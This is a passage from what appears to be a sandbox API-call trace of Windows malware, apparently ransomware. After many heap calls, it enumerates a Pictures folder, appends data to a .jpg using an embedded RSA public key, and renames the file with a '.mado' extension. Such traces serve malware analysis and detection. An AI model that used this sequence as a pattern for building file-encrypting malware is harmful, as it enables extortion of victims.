lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.480] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0205.480] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0205.480] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.480] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.480] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.480] PathFindFileNameW (pszPath="") returned="" [0205.480] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaee56e50, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0xf83bfd10, ftLastAccessTime.dwHighDateTime=0x1d5dae3, ftLastWriteTime.dwLowDateTime=0xf83bfd10, ftLastWriteTime.dwHighDateTime=0x1d5dae3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.481] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaee56e50, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0xf83bfd10, ftLastAccessTime.dwHighDateTime=0x1d5dae3, ftLastWriteTime.dwLowDateTime=0xf83bfd10, ftLastWriteTime.dwHighDateTime=0x1d5dae3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.481] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x609b2700, ftCreationTime.dwHighDateTime=0x1d5e34f, ftLastAccessTime.dwLowDateTime=0xb7006bf0, ftLastAccessTime.dwHighDateTime=0x1d5e791, ftLastWriteTime.dwLowDateTime=0xb7006bf0, ftLastWriteTime.dwHighDateTime=0x1d5e791, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5DSZWpKJg8HwZKscy", cAlternateFileName="5DSZWP~1")) returned 1 [0205.481] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb78994b0, ftCreationTime.dwHighDateTime=0x1d5e0e4, ftLastAccessTime.dwLowDateTime=0x1c1b3070, ftLastAccessTime.dwHighDateTime=0x1d5e07f, ftLastWriteTime.dwLowDateTime=0x1c1b3070, ftLastWriteTime.dwHighDateTime=0x1d5e07f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="941Y-ufnAszYHOsd", cAlternateFileName="941Y-U~1")) returned 1 [0205.481] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57448b0, ftCreationTime.dwHighDateTime=0x1d5d9e6, ftLastAccessTime.dwLowDateTime=0xeb249080, ftLastAccessTime.dwHighDateTime=0x1d5dadc, ftLastWriteTime.dwLowDateTime=0xeb249080, ftLastWriteTime.dwHighDateTime=0x1d5dadc, nFileSizeHigh=0x0, nFileSizeLow=0xef60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9ZtHFhZWPe4KdJb8d.jpg", cAlternateFileName="9ZTHFH~1.JPG")) returned 1 [0205.481] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\9ZtHFhZWPe4KdJb8d.jpg") returned=".jpg" [0205.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\9ZtHFhZWPe4KdJb8d.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\9zthfhzwpe4kdjb8d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.483] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=61280) returned 1 [0205.483] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.485] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xef3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.485] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.487] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xef60, lpOverlapped=0x0) returned 1 [0205.488] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.488] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.488] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.488] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.489] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.489] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.489] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.489] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.489] GetLastError () returned 0x0 [0205.489] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.489] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.489] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.489] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.489] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.490] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.490] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xef60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.490] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.490] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.490] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.490] CloseHandle (hObject=0x63c) returned 1 [0205.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.492] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\9ZtHFhZWPe4KdJb8d.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\9zthfhzwpe4kdjb8d.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\9ZtHFhZWPe4KdJb8d.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\9zthfhzwpe4kdjb8d.jpg.mado")) returned 1 [0205.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.492] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.493] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc3c31cd0, ftCreationTime.dwHighDateTime=0x1d5e81c, ftLastAccessTime.dwLowDateTime=0xd384ea70, ftLastAccessTime.dwHighDateTime=0x1d5dc52, ftLastWriteTime.dwLowDateTime=0xd384ea70, ftLastWriteTime.dwHighDateTime=0x1d5dc52, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GVo5E", cAlternateFileName="")) returned 1 [0205.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0205.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.494] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a11bc60, ftCreationTime.dwHighDateTime=0x1d5d9d6, 